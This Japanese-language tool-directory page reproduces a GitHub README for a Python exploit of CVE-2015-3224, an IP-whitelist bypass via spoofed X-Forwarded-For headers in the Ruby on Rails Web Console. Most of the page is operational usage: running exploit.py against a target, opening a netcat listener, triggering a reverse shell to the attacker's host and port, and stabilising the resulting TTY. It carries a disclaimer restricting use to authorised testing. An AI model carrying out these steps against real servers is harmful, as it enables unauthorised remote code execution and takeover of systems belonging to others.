Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2015-3224 — Ruby on Rails Web Console エクスプロイト (CVE-2015-3224) | Kitploit
ツール/GitHubGitHub/sic4rio/cve-2015-3224
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育リモートアクセスツール
GitHubsic4rio/cve-2015-3224

CVE-2015-3224

Ruby on Rails Web Console エクスプロイト (CVE-2015-3224)

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Ruby on Rails Web Console Exploit(CVE-2015-3224)

CVE-2015-3224

このリポジトリには、Ruby on Rails 4.0.x および 4.1.x の開発者用WebコンソールにおけるIPホワイトリストバイパス脆弱性を悪用するためのPythonスクリプトが含まれています。このスクリプトを使用すると、脆弱性のあるサーバーに対してリモートコード実行が可能になります。

⚠️ 免責事項 このスクリプトは、教育目的および許可を得たセキュリティテスト専用です。 明示的な許可なくいかなるシステムに対しても使用しないでください。 著者は、このスクリプトの誤用またはそれによって引き起こされる損害について一切責任を負いません。


📌 脆弱性の説明

脆弱性のあるバージョンのRuby on RailsにおけるWebコンソールは、開発目的で設計されており、信頼できるIPアドレスからのみアクセスできるようにする必要があります。しかし、X-Forwarded-For HTTPヘッダーの不適切な処理により、攻撃者は自分のIPアドレスを偽装して、信頼できるローカルユーザー(例:127.0.0.1 または ::1)になりすますことができます。これによりIPホワイトリストがバイパスされ、Webコンソールへの不正アクセスが許可され、リモートコード実行につながります。


🚀 特徴

  • 使いやすさ: シンプルなコマンドラインインターフェース。
  • 動的パス検出: ターゲットを自動的にプローブし、動的なコンソールセッションパスを見つけます。
  • 2つのシェルモード:
    • シンプルシェル: クイックコマンド用の基本的な非対話型シェル。
    • リバースTTYシェル: 完全に対話型のPTYリバースシェルを取得するためのワンライナーコマンド。
  • 可読性の向上: ステータスメッセージ、成功、エラーを色分けして出力。
  • 堅牢性: ネットワーク障害やコマンド失敗に対するエラーハンドリングを内蔵。

✅ 要件

  • Python 3
  • requests ライブラリ

requests をインストール:

root@kitploit:~
pip install requests

⚙️ 使用方法

  1. リポジトリをクローン:

    root@kitploit:~
    git clone https://github.com/Sic4rio/CVE-2015-3224
    cd <リポジトリディレクトリ>
    
  2. スクリプトを実行可能にする:

    root@kitploit:~
    chmod +x exploit.py
    

オプション1: シンプルな対話型シェル

このモードは、迅速で単純なコマンドを実行するのに便利です。

root@kitploit:~
./exploit.py -t http://<TARGET_IP>:<PORT>

オプション2: 完全対話型TTY(リバースシェル)

安定した完全対話型シェルには、このモードをお勧めします。

ステップ1: リスナーを起動

ローカルマシンで新しいターミナルを開き、netcat リスナーを起動します。

root@kitploit:~
nc -lvnp 9001

ステップ2: エクスプロイトを実行

別のターミナルで、自分のローカルIP(lhost)とポート(lport)を指定して、--rev-shell フラグを付けてスクリプトを実行します。

root@kitploit:~
./exploit.py -t http://<TARGET_IP>:<PORT> --rev-shell --lhost <YOUR_IP> --lport 9001

ステップ3: シェルを安定化

netcat リスナーに接続が届きます。完全に対話型のTTYにアップグレードするには、netcatウィンドウ内で 次の手順を実行します。

  1. シェルをバックグラウンドに 移すには、Ctrl+Z を押します。
  2. ローカルターミナルをrawモードに設定 し、シェルをフォアグラウンドに戻します。
    root@kitploit:~
    stty raw -echo; fg
    
    プロンプトが再表示されない場合は、Enter キーを押します。
  3. リモートシェルでターミナルプロパティを設定 します。
    root@kitploit:~
    reset
    export SHELL=bash
    export TERM=xterm-256color
    stty rows 50 cols 120
    

これで、完全に機能する安定したシェルが手に入りました!


👥 クレジット

  • 元のエクスプロイト: Eval (@0xEval)
  • Readme.mdファイル: GPT
ツールをダウンロード